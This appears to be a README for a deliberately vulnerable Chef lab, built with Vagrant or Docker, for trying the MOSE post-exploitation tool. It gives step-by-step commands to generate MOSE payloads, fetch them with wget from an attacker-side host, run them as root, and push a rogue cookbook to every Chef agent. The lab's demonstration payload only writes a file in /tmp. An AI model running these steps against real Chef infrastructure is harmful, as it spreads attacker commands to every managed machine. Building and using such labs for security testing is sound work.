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175 lines (125 loc) · 5.2 KB


License Pre-commit Test chef-test-lab

Used to create a test lab that can be used to work with MOSE and Chef.

Warning, take heed: This lab should be run in a controlled environment; it contains vulnerable assets.


You must download and install the following for this environment to work:

Vagrant Lab Build Instructions

To create an environment with a Chef Workstation and a Chef Server that controls multiple agents, run the following command:

cd vagrant && make build && make run

To run MOSE against the vagrant chef workstation

  1. Build MOSE using make build in the MOSE repo

  2. Generate a payload with MOSE:

    ./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t chef
  3. Login to the chef workstation:

    # The password is vagrant
    vagrant ssh chef_workstation
  4. Escalate to root with sudo su

  5. Download the binary from MOSE:

    wget http://YOURIPADDRESSGOESHERE:8090/chef-linux`
  6. Run the payload:

    chmod +x chef-linux; ./chef-linux
  7. Wait for 30 minutes or ssh into one of the agents and kick off the payload manually:

    # The password is vagrant
    vagrant ssh chef_agent_1
    sudo su
  8. For this example, you should note that a file has been created in /tmp in all of the chef-agent virtual machines, as we specified in step 2.

To run MOSE against the vagrant chef server

  1. Build MOSE using make build in the MOSE repo

  2. Generate a payload with MOSE:

    ./mose -c "touch /tmp/BLA && echo test >> /tmp/BLA" -t chef -l <your local ip address> -ep 9090 -rhost chef-server:

    2a. The exfil listener time can be set with the -ep parameter 2b. The -rhost parameter is a necessity if running against a chef-server.

  3. Login to the chef server: vagrant ssh chef_server (the password is vagrant)

  4. Escalate to root with sudo su

  5. Download the binary from MOSE: wget http://YOURIPADDRESSGOESHERE:8090/chef-linux

  6. Back on the attacker's system, specify n for the target being a workstation and Y when prompted for the target being a server

  7. Run the payload: chmod +x chef-linux; ./chef-linux

  8. Use the container that is spawned on the attacking machine as if it were a workstation to get the rogue cookbook into place

  9. Wait for 30 minutes or ssh into one of the agents and kick off the payload manually: vagrant ssh chef_agent_1 (the password is vagrant)
    9a. Escalate to root with sudo su
    9b. Run chef-client

  10. For this example, you should note that a file has been created in /tmp in all of the chef-agent virtual machines, as we specified in step 2.

Docker Lab Build Instructions

To create an environment with a Chef Workstation and a Chef Server that controls a single agent, run the following command:

cd docker/basic && make run

To run MOSE against the docker chef workstation

  1. Build MOSE using make build in the MOSE repo

  2. Wait for 15 minutes or so for the environment to start working. You can track the progress with this command:

    while true; do sleep 2; docker logs basic-chef-workstation; done

    You will know it's done when you see this:

    id: mysql_pw
    password: TheM0stS3cr3T!!!
    user: mysql
  3. Generate a payload with MOSE:

    ./mose -c "touch /tmp/test.txt && echo test >> /tmp/test.txt" -t chef -f "${PWD}/payloads/chef-linux"

    and be sure to answer Y when prompted.

  4. Transfer the payload to the chef workstation container:

    docker cp payloads/chef-linux basic-chef-workstation:/chef-linux
  5. Run the payload:

    docker exec -i basic-chef-workstation /bin/bash -c "echo 'n' | /chef-linux"
  6. Wait for 30 minutes or exec into the agent and kick off the payload manually:

    docker exec -i basic-chef-agent-1 /bin/bash -c "chef-client"
  7. Observe that a file has been created on the agent in /tmp:

    docker exec -i basic-chef-agent-1 /bin/bash -c "cat /tmp/test.txt"

Please note: The docker lab does not support transferring payloads to the target via the web server. You can however generate a payload with the -f parameter and transfer it via docker cp.

To tear down the test environment, run the following command:

make destroy


The chef server docker container is provided courtesy of this repo.